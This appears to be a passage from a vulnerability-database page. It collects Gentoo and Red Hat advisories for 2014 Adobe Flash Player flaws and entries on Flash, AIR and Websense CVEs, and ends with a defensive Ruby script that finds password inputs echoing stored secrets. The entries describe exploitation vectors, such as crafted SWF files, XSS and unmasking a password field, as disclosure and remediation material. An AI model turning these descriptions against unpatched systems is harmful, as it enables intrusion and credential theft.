Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. Adobe AIR is a cross-operating system runtime environment that can be used to build and configure cross-platform desktop RIA (Rich Internet Applications) applications.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass
the Same Origin Policy or read the clipboard via unspecified vectors.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.356"
References
==========
[ 1 ] CVE-2014-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0498
[ 2 ] CVE-2014-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0499
[ 3 ] CVE-2014-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0502
[ 4 ] CVE-2014-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0503
[ 5 ] CVE-2014-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0504
[ 6 ] CVE-2014-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0506
[ 7 ] CVE-2014-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0507
[ 8 ] CVE-2014-0508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0508
[ 9 ] CVE-2014-0509
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0509
[ 10 ] CVE-2014-0515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0515
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201405-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:0380-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0380.html
Issue date: 2014-04-09
CVE Names: CVE-2014-0506 CVE-2014-0507 CVE-2014-0508
CVE-2014-0509
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having Critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-09,
listed in the References section.
Two flaws were found in the way flash-plugin displayed certain SWF content.
An attacker could use these flaws to create a specially crafted SWF file
that would cause flash-plugin to crash or, potentially, execute arbitrary
code when the victim loaded a page containing the malicious SWF content.
(CVE-2014-0506, CVE-2014-0507)
A flaw in flash-plugin could allow an attacker to obtain sensitive
information if a victim were tricked into visiting a specially crafted web
page. (CVE-2014-0508)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a specially
crafted web page. (CVE-2014-0509)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 11.2.202.350.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1085581 - CVE-2014-0506 CVE-2014-0507 flash-plugin: two flaws leading to code execution (APSB14-09)
1085585 - CVE-2014-0508 flash-plugin: information disclosure flaw (APSB14-09)
1085586 - CVE-2014-0509 flash-plugin: cross-site scripting flaw (APSB14-09)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.350-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.350-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.350-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.350-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.350-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.350-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.350-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.350-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.350-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.350-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0506.html
https://www.redhat.com/security/data/cve/CVE-2014-0507.html
https://www.redhat.com/security/data/cve/CVE-2014-0508.html
https://www.redhat.com/security/data/cve/CVE-2014-0509.html
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb14-09.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTRQk9XlSAg2UNWIIRAksjAKCbnm4UGitMzrcZoEuifY3AS5L9hQCdH2Ou
CgUxC7S1jhlSSEYdIzvdiL8=
=tqNu
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201404-0198 | CVE-2014-0507 | Adobe Flash Player and Adobe AIR buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows attackers to execute arbitrary code via unspecified vectors. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the usage of regular expressions in ActionScript, where an expression could overflow a data structure on the stack. An attacker can leverage this vulnerability to execute code in the context of the current process. Failed exploit attempts likely result in denial-of-service conditions. Adobe AIR is a cross-operating system runtime environment that can be used to build and configure cross-platform desktop RIA (Rich Internet Applications) applications.
| VAR-201404-0195 | CVE-2014-0509 | Adobe Flash Player and Adobe AIR cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Adobe AIR is a cross-operating system runtime environment that can be used to build and configure cross-platform desktop RIA (Rich Internet Applications) applications. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML.
| VAR-201404-0465 | CVE-2014-0347 | Websense Triton Unified Security Center 7.7.3 information disclosure vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
The Settings module in Websense Triton Unified Security Center 7.7.3 before Hotfix 31, Web Filter 7.7.3 before Hotfix 31, Web Security 7.7.3 before Hotfix 31, Web Security Gateway 7.7.3 before Hotfix 31, and Web Security Gateway Anywhere 7.7.3 before Hotfix 31 allows remote authenticated users to read cleartext passwords by replacing type="password" with type="text" in an INPUT element in the (1) Log Database or (2) User Directories component. TRITON Unified Security Center provided by Websense contains an information disclosure vulnerability (CWE-200: Information Exposure, http://cwe.mitre.org/data/definitions/200.html): switching the field type reveals the stored password because the settings page returns it to the browser in the INPUT element's value attribute, so any user who holds an account on the product may obtain the credentials stored in its Log Database and User Directories settings. TRITON Unified Security Center, Web Filter, Web Security, Web Security Gateway and Web Security Gateway Anywhere are all products of the US company Websense. A remote authenticated attacker can exploit this vulnerability to read plaintext passwords by replacing type='password' with type='text' in an INPUT element.
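Replacing type="password" with type="text" only works because the settings page sends the stored secret back to the browser in the field's value attribute; the masking is purely cosmetic and anyone with the response (view-source, browser devtools, an intercepting proxy) already has the cleartext. The Ruby below is an added example, not Websense's code; the form markup and field names are constructed. It scans a page for password inputs that carry a prefilled value, a quick check to run against any admin UI during a review, and shows the safe rendering: an empty field whose blank submission means "keep the current password".

```ruby
require 'cgi'

# Added example (not Websense's code). The page below is constructed to show the
# defect class behind CVE-2014-0347: a stored password echoed into an
# <input type="password">, masked on screen but present in the HTML.
VULNERABLE_PAGE = <<~HTML
  <form action="/settings/logdb" method="post">
    <input type="text" name="db_host" value="logdb.example.internal">
    <input type="text" name="db_user" value="wslog">
    <input type="password" name="db_password" value="S3cr3t-Passw0rd!">
    <input type="submit" value="Save">
  </form>
HTML

# Returns [[name, value], ...] for every password input with a non-empty value
# attribute. Anyone who can see the response reads the value in cleartext;
# flipping the type attribute in the browser only changes how it is displayed.
def prefilled_password_fields(html)
  html.scan(/<input\b[^>]*>/i).each_with_object([]) do |tag, found|
    next unless tag =~ /\btype\s*=\s*["']?password["']?/i
    name  = tag[/\bname\s*=\s*["']([^"']*)["']/i, 1]
    value = tag[/\bvalue\s*=\s*["']([^"']*)["']/i, 1]
    found << [name, value] if value && !value.empty?
  end
end

# Safe rendering: the stored secret never leaves the server. The field is empty
# and autocomplete is disabled so the browser does not fill it in either.
def render_password_field(name)
  %(<input type="password" name="#{CGI.escapeHTML(name)}" value="" autocomplete="new-password">)
end

# Matching server-side rule: a blank submission means "keep the current
# password"; anything else replaces it. Returns the value to store.
def apply_password_change(stored, submitted)
  submitted.nil? || submitted.empty? ? stored : submitted
end

if __FILE__ == $0
  prefilled_password_fields(VULNERABLE_PAGE).each do |name, value|
    puts "prefilled password field #{name}: #{value}"
  end
  puts render_password_field("db_password")
end
```

The scanner is deliberately regex-based so it runs with no dependencies against a saved response; for a full crawl, feed it each page body from a proxy log. The "blank means unchanged" rule is what lets the form drop the value attribute without forcing administrators to retype every stored credential on save.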